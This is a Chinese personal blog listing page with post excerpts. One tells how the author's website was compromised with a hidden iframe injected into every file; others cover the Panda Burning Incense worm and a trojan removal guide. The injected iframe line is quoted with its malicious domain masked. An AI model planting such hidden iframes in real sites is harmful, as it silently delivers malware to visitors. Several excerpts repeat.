小提
新示
本人网站“遭黑”记
作者:soosi 日期:2007-03-05
本人网站“遭黑”记
【问题】
◎2007年2月,回家过年过寒假。忽视了及时定期备份网站的工作。
◎2007年2月28日返校,访问网站每个页面时,卡巴斯基都提示有“Trojan-Downloader.VBS.Small.df”的病毒提示,并且在电子邮箱里也收到了两位网站访客的“病毒举报”。
同日,马上检查,发现:网站内所有asp、txt、xml、asa文件全被加入了“<iframe src=http://www.*****.cn/index.htm width=0 height=0></iframe>”的代码(恶意网站代码用*略去)。。(搜索之后得知一些学校网站或者博客、论坛也曾遭遇过,幸好“框架挂马”还只是“挂马”当中比较简单的方式,挂马后,任何一个页面被访问时都成为了传播病毒的“网马”。)
【惊心动魄】“熊猫烧香”病毒幕后黑手曝光
作者:soosi 日期:2007-02-07
这是一波电脑病毒蔓延的狂潮。在两个多月的时间里,数百万电脑用户被卷将进去,那只憨态可掬、颔首敬香的“熊猫”除而不尽,成为人们噩梦般的记忆。
反病毒工程师们将它命名为“尼姆亚”。它还有一个更通俗的名字———“熊猫烧香”。 它迅速化身数百种,不断入侵个人电脑,感染门户网站,击溃企业数据系统……它的蔓延考问着网络的公共安全,同时引发了一场虚拟世界里“道”与“魔”的较量。反病毒工程师和民间反病毒人士纷纷投身其中。1月19日,一个最新的“熊猫烧香”变种病毒出现。病毒作者宣称,这将是“熊猫烧香”最后一次更新。这场历时两个多月的较量结束了吗?
“蜜罐”中发现病毒
2006年11月14日,中关村瑞星公司总部14楼。
反病毒工程师们将它命名为“尼姆亚”。它还有一个更通俗的名字———“熊猫烧香”。 它迅速化身数百种,不断入侵个人电脑,感染门户网站,击溃企业数据系统……它的蔓延考问着网络的公共安全,同时引发了一场虚拟世界里“道”与“魔”的较量。反病毒工程师和民间反病毒人士纷纷投身其中。1月19日,一个最新的“熊猫烧香”变种病毒出现。病毒作者宣称,这将是“熊猫烧香”最后一次更新。这场历时两个多月的较量结束了吗?
“蜜罐”中发现病毒
2006年11月14日,中关村瑞星公司总部14楼。
twunk32.exe木马的清除指南(出现N个IEXPLORE.EXE进程)
作者:soosi 日期:2007-01-16
最近,发现好多台电脑在没有打开IE的情况下,都出现了N个IEXPLORE.EXE的进程(最多时有9个),中毒无疑。杀毒软件根本是没有反应的。几经查证,终于知道是twunk32.exe这个家伙在搞鬼,于是,修改注册表,安全模式下删除文件。。但是依然。。死灰复燃。。。。在网上搜寻了办法花了一个多星期了,现在终于找到方法了,转载如下:
Trojan-Downloader.Win32.Small.czl分析
病毒标签:
病毒名称: Trojan-Downloader.Win32.Small.czl
病毒类型: 木马
文件 MD5: 2D747C2BAC72A1E87F4DA7F8E7C1E985
Trojan-Downloader.Win32.Small.czl分析
病毒标签:
病毒名称: Trojan-Downloader.Win32.Small.czl
病毒类型: 木马
文件 MD5: 2D747C2BAC72A1E87F4DA7F8E7C1E985
【构想】构建提供校内下载的soosi个人ftp资源空间
作者:soosi 日期:2006-11-15
正在构想ing,强烈的想法。。。构建提供校内下载的soosi个人ftp资源空间。。
大学时候玩的,应该有很好的作用吧。。用Surv-U以及花生壳。。。
计划有“电脑教程”“课件素材”“常用软件”“电视电影”“视频资源”(美食、游泳教程、学车教程、时事新闻等)“音乐下载”(男歌手,女歌手,Light music系列、英语经典等)“电子书籍”“精美图集”等等。。。。
呵呵,现在时间不够用。。。而且硬盘空间也不够我自己用。。而且还没有解决防火墙的安全问题。。所以。。。大家期待着先吧。。。。小新会努力的啦。。。等待我的好消息。。。。
大学时候玩的,应该有很好的作用吧。。用Surv-U以及花生壳。。。
计划有“电脑教程”“课件素材”“常用软件”“电视电影”“视频资源”(美食、游泳教程、学车教程、时事新闻等)“音乐下载”(男歌手,女歌手,Light music系列、英语经典等)“电子书籍”“精美图集”等等。。。。
呵呵,现在时间不够用。。。而且硬盘空间也不够我自己用。。而且还没有解决防火墙的安全问题。。所以。。。大家期待着先吧。。。。小新会努力的啦。。。等待我的好消息。。。。
